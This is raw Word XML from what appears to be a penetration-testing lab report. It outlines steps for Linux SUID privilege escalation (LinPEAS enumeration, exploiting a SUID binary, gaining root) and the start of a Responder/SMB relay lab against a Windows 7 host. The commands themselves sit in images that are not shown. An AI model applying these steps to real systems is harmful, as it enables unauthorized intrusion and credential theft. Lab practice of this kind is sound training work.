            </wp:positionV>
            <wp:extent cx="1695687" cy="304843"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="194606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06392" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1695687" cy="304843"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00FD5EF3">
        <w:t>Give permission.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F68BAFD" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="5FDA5659" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00FD5EF3" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="562F7763" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002F4597">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4059E731" wp14:editId="540716B8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>269875</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1343025" cy="285750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="272478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478480" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1343025" cy="285750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>Run LinPEAS enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7603EFBF" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="101169FA" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="071B4B67" w14:textId="7DA53104" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C2E5A5" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F6EEAAD" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48CAB211" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56055C58" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76853BEF" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29BDEC84" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F34C731" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24BFC75A" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41434C80" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="573E7685" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD9DDF1" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75395ADC" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EF17E3" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E8A2BAF" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="765E3E0C" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66DFD805" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29380FD4" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FCCDD8B" w14:textId="028AC1D7" w:rsidR="00650553" w:rsidRDefault="00396549" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251703296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2EFF7B78" wp14:editId="140A0AB4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>286247</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2350105" cy="3880236"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="951963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63217" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2350105" cy="3880236"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00650553">
        <w:t>Find the SUID files using the below command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415BE08F" w14:textId="15AF5634" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1503"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CC2973A" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="0063655D" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="50307EA3" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="0063655D" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="6F7702B6" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="0063655D" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="43AFF59B" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="0063655D" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="506E0DF4" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="0063655D" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="291A30E5" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="0063655D" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="6CD28034" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="0063655D" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="628D41E0" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="0063655D" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="6025194C" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="7771CBAC" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="76B0C719" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="169522FF" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="3D69EA9F" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="6ACFE471" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="5691D950" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="3288CDDF" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="77BF5269" w14:textId="77777777" w:rsidR="00396549" w:rsidRPr="0063655D" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="0A485A2B" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="0063655D" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="14B7EA22" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="0063655D" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="6E9DCAE7" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="367DF4BB" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="19228AAB" w14:textId="6FF6461F" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit SUID Binary using the below command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2E88B4" w14:textId="213100BE" w:rsidR="00650553" w:rsidRPr="00AB7A11" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:r w:rsidRPr="006A71DB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251704320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F502AC9" wp14:editId="028973FC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8587</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2610214" cy="447737"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapNone/>
            <wp:docPr id="1281948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948030" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2610214" cy="447737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3F3F46" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="3F15DB66" w14:textId="77777777" w:rsidR="00396549" w:rsidRDefault="00396549" w:rsidP="00650553"/>
    <w:p w14:paraId="5E6B511F" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>We now have root privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613F34B" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553">
      <w:r w:rsidRPr="00F409BF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251705344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24E3433A" wp14:editId="3C5291EC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-3534</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1867161" cy="762106"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1451600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600525" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1867161" cy="762106"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="566966B3" w14:textId="77777777" w:rsidR="00650553" w:rsidRPr="00F409BF" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="2495D4CB" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="23113B93" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="67274959" w14:textId="77777777" w:rsidR="00650553" w:rsidRDefault="00650553" w:rsidP="00650553"/>
    <w:p w14:paraId="27DB940F" w14:textId="77777777" w:rsidR="00E268B0" w:rsidRDefault="00E268B0" w:rsidP="00E268B0"/>
    <w:p w14:paraId="2EF67953" w14:textId="77777777" w:rsidR="004B2DD1" w:rsidRDefault="004B2DD1" w:rsidP="00E268B0"/>
    <w:p w14:paraId="4F5AC73E" w14:textId="77777777" w:rsidR="004B2DD1" w:rsidRDefault="004B2DD1" w:rsidP="00E268B0"/>
    <w:p w14:paraId="0798157F" w14:textId="77777777" w:rsidR="004B2DD1" w:rsidRDefault="004B2DD1" w:rsidP="00E268B0"/>
    <w:p w14:paraId="13768ECC" w14:textId="77777777" w:rsidR="004B2DD1" w:rsidRDefault="004B2DD1" w:rsidP="00E268B0"/>
    <w:p w14:paraId="292142DA" w14:textId="77777777" w:rsidR="004B2DD1" w:rsidRDefault="004B2DD1" w:rsidP="00E268B0"/>
    <w:p w14:paraId="51FB9BA6" w14:textId="77777777" w:rsidR="004B2DD1" w:rsidRDefault="004B2DD1" w:rsidP="00E268B0"/>
    <w:p w14:paraId="58868948" w14:textId="77777777" w:rsidR="004B2DD1" w:rsidRDefault="004B2DD1" w:rsidP="00E268B0"/>
    <w:p w14:paraId="02D87842" w14:textId="77777777" w:rsidR="004B2DD1" w:rsidRDefault="004B2DD1" w:rsidP="00E268B0"/>
    <w:p w14:paraId="6156C64C" w14:textId="77777777" w:rsidR="004B2DD1" w:rsidRDefault="004B2DD1" w:rsidP="00E268B0"/>
    <w:p w14:paraId="443281F9" w14:textId="77777777" w:rsidR="004B2DD1" w:rsidRDefault="004B2DD1" w:rsidP="00E268B0"/>
    <w:p w14:paraId="04184D46" w14:textId="5268139C" w:rsidR="004B2DD1" w:rsidRDefault="00EB6FBA" w:rsidP="00EB6FBA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc224731504"/>
      <w:r w:rsidRPr="00EB6FBA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Network Protocol Attacks Lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="5B33ED0A" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Record the ip address of Kali Linux machine and Windows 7 machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219825B" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="001A31FE">
        <w:t>Kali Linux machine:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 192.168.1.35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AAC236" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Windows 7 machine: 192.168.1.42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE973D9" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="330E2AB1" w14:textId="69A45023" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00633A0C">
        <w:t>Configure Responder</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4188A07E" w14:textId="5FA34480" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:r w:rsidRPr="009A4019">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251707392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79D0EC08" wp14:editId="1D23382F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>45168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3591426" cy="933580"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1761047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047969" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3591426" cy="933580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00633A0C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3181D399" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="009A4019" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="5C9F558B" w14:textId="77777777" w:rsidR="00410B43" w:rsidRPr="009A4019" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="67A1A1D7" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="081695AF" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="6FE91CB8" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
    <w:p w14:paraId="3ECAA7F9" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00696472">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251708416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0078A94A" wp14:editId="6F74BB3E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>285943</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1255003" cy="3689405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="1903403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403641" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1255003" cy="3689405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F076DE">
        <w:t>SMB must be OFF for relay attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9AC063" w14:textId="77777777" w:rsidR="00410B43" w:rsidRDefault="00410B43" w:rsidP="00410B43"/>
